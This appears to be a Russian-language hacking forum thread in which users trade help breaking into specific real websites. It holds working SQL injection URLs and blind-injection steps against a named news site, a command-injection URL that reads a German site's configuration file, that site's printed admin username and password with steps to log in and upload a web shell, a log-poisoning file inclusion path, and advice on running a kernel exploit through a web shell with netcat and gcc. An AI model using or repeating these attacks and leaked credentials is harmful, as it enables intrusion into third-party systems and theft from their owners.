В чём проблема использовать уже готовый сплойт? зачем тебе эта прога? ты вручную собрался перебирать?
смысл не в сплоите а в том почему у меня так же не получается произвести SQL и главный смысл мне понять как в коде найти SQL (явный код я знаю как там найти а тут не догодался бы) вот и пытался сделать так же ..НО борода P.S. про сплоит речи не было
Баг будет работать при register_globals=ON Ну и разумеется если версию не пропатчили. Тот кусок кода который привёл ты не даёт полной картины. Фильтры там стоят вообще в другом файле, самого запроса у тебя тоже нет. Какого совета ты хочешь? Перичитай статью Электа, посмотри ещё раз видио, если ты имея на руках сорцы не видишь по коду есть скуль или нет, то наверное нужно браться за то что попроще, а не задавать вопросы на которые нет ответов. Это из серии "я подставил кавычку и у меня ошибка, как мне взломать сайт".
Народ вот нашел уязвимость, http://www.rukso.ru/news/own/999190'+and+1=2+union+select+1,1,1,4,5,6,1+from+_members+--+ Но не могу подобрать колонки, можно отсюда чтонить выжать? http://www.rukso.ru/admin/ - админка соответственно
Так я и грю, что таблицы не подобрать! а _members оставил чтобы инъект было видно! information_schema не доступна. Просто может кто этот CMS Знает и таблицу юзеров подскажет? Или какой другой вариант пробывать?
Code: http://www.rukso.ru/news/own/999190+or+1=0 - шаг 1 http://www.rukso.ru/news/own/999190+or+1=1 - шаг 2 http://www.rukso.ru/news/own/999190+or+1=1+and+substring(version(),1,1)=4 - шаг 3 Дальше хз, вроде слепая просто Дык 4-ая ветка, её там и нет, только брут, по определению
1.Здрасте. Короче вот http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls| это выполнение команд на серве. я узнал что на серве есть PHP. У меня есть шелл на народе. Помогите залить шелл через выплнение команд. т.е. надо создать файл с расш. пхп и запусить? помогите плиз. и подскажите дерикторию плиз в которой сайт лежит ЗЫ деф. не буду. чесн слово. 2. Помогите заюзать InetCrack чтобы в данном логе осталась моя запись например PRIVET? http://www.lohuis.ro/index.php?page=../../../../../../../../../../var/log/apache/error_log%00
Тэк.... Вообщем идём сюда :http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|cat%20../htdocs/admin/config.inc.php| там подглядываем такое: Code: $login["server"]="localhost"; $login["user"]=$DBUser; $login["password"]=$DBPass; $login["database"]="insotag"; $ftpuser=$login["user"]; $ftppass=$login["password"]; $ftpserver="www.insolvenzrechtstag.de"; $ftppfad="www/htdocs/pdfdoc"; $webpfad="../pdfdoc"; $adminuser="insotag"; $adminpass="hoersaal"; $admintemplate="../Templates/administration.dwt"; $erfassentemplate="../Templates/erfassen.dwt"; $bearbeitentemplate="../Templates/bearbeiten.dwt"; $loeschentemplate="../Templates/loeschen.dwt"; Отсюда видно, что $adminuser="insotag"; $adminpass="hoersaal"; Потом идём сюда: http://www.insolvenzrechtstag.de/admin/ вводим логин и пароль, проходим в http://www.insolvenzrechtstag.de/admin/index.php?modus=erfassen и заливаем шелл... так как я в немецком нини то...
Можно ли что-то сделать с этим запросом в скрипте PHP: $row = mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");? Допустим вставить свои данные в другую таблицу? Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5.
Подскажите плиз. имеется WEB Shell на серваке. называется WSO2. На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит? http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29 add // резервисты пришли, посмотрели и ушли
nub-hacker На форуме куча статей, по запуску сплоитов в том числе. Будешь продолжать ничего не читая задавать вопросы и переносить сюда тему PHP инъекций с просьбой залить шелл , этот мультиакк тоже уйдёт в бан. Мне даже в модцп не нужно лезть, что-бы понять кто ты.
Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.
Народ,чем к бд приконнектиться ещё можно ? SQL Manager: Can't connect Client does not support authentication protocol requested by server; consider upgrading MySQL client Выдаёт мой любимый с99 модификэйтед )))).
Люди,чем объяснить то,что у одних клиентов одного и того же хостера работает компиль.а у других не то,что не работает,а даже не установлен ?
Разные тарифные планы, соответственно разные возможности у каждоно клиента, так было всегда и так будет абсолютно у любого хостера
